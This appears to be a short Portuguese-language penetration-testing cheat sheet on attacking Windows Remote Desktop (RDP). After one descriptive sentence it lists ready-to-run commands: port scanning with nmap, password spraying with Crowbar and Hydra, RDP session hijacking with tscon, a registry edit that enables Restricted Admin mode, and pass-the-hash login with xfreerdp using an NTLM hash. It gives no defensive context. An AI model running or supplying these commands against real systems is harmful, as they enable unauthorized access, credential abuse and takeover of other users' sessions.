RDP

O Remote Desktop Protocol (RDP) é um protocolo proprietário desenvolvido pela Microsoft que fornece ao usuário uma interface gráfica para se conectar a outro computador por meio de uma conexão de rede. Por padrão, o RDP usa a porta TCP/3389.

• Nmap

nmap -Pn -p3389 192.168.2.143

• Crowbar - Pulverização de senha RDP

crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'

• Hydra - Pulverização de senha RDP

hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp

• Login RDP

rdesktop -u admin -p password123 192.168.2.143

• Representar um usuário sem sua senha.

tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME}

• Execute o sequestro de sessão RDP.

net start sessionhijack

• Habilite o "Modo de Administração Restrito" no host Windows de destino.

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

• Use a técnica Pass-The-Hash para efetuar login no host de destino sem uma senha.

xfreerdp /v:192.168.2.141 /u:admin /pth:A9FDFA038C4B75EBC76DC855DD74F0DA